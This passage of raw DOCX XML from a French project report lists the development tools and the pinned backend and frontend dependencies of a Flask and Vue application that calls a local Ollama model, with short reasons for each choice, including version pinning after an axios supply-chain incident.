              <w:t xml:space="preserve">Ollama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0.35.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serveur d'inférence local, écoute sur</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">http://localhost:11434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mailtrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serveur SMTP de test : les courriels de réinitialisation sont capturés, jamais délivrés à de vraies adresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DB Browser for SQLite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inspection de la base de développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Docker + Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Conteneurisation de la pile (MySQL 8.4, backend, frontend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Ruff / ESLint / Prettier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Analyse statique et format, backend et frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux choix méritent d'être justifiés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mailtrap plutôt qu'un vrai serveur SMTP.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tester une réinitialisation de mot de passe demande d'envoyer des courriels à répétition. Une sandbox les intercepte : aucun risque d'écrire à une adresse réelle lors d'un test avec des données d'exemple, et le contenu du message reste inspectable, y compris le lien contenant le jeton.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Ollama installé localement plutôt qu'un conteneur. Le modèle qwen2.5:3b pèse plusieurs gigaoctets ; le garder hors du cycle de construction du projet évite de le re-télécharger à chaque reconstruction d'image. La contrepartie est qu'il s'agit d'un composant à tenir à jour comme un autre — la version installée indiquée ci-dessus, 0.35.1, découle directement de la veille (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="85" w:name="X4c9993feee0460b61edab6d627145bfb7242c12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pile applicative et dépendances</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="83" w:name="Xf3d9023f726e803abe5eab79db2bc0940dd961e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Backend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Neuf dépendances directes, chacune avec une raison d'être unique. La liste est volontairement courte : chaque bibliothèque ajoutée est une surface d'attaque et une dette de maintenance supplémentaires.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Paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Micro-framework HTTP, blueprints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Flask-Cors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En-têtes CORS pour le front Vite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Flask-Limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitation de débit sur les routes sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Flask-Mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Envoi du courriel de réinitialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLAlchemy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ORM, API 2.0 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DeclarativeBase</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Mapped</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mapped_column</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hachage des mots de passe, salage automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PyJWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.15.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Signature et vérification des access tokens (HS256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.34.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Appels HTTP vers l'API locale d'Ollama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">python-dotenv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chargement du fichier</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>PyMySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Pilote MySQL de SQLAlchemy en conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Exigée par PyMySQL pour l'authentification caching_sha2_password de MySQL 8.4 — sans elle, la première connexion de la pile échoue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>gunicorn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Serveur d'application en conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les versions sont</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">figées</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) et non bornées (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Sur un projet évalué et reproductible, un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">doit produire le même environnement six mois plus tard ; une borne ouverte exposerait à une mise à jour majeure silencieuse — ou, comme l'a montré l'incident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 11), à l'installation involontaire d'une version compromise.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="Xaa5f8574cc346eda3fd354261493ca2989a397d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Frontend</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Paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vue-router</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pinia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Framework, routage, état partagé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">typescript</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vue-tsc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Typage statique, vérification à la construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vite</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@vitejs/plugin-vue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serveur de développement et empaquetage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>tailwindcss, @tailwindcss/vite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Styles utilitaires. daisyUI a été retiré : 45,6 Ko pour cinq classes utilisées (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@codemirror/*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(4 paquets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur de code : vue, état, commandes, coloration Markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">marked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conversion Markdown → HTML pour l'aperçu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>dompurify ^3.4.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Assainissement du HTML produit par</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">marked</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>avant injection (§ 7.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">axios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Client HTTP, support des intercepteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La construction passe par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vue-tsc -b &amp;&amp; vite build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: le typage est vérifié</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">avant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
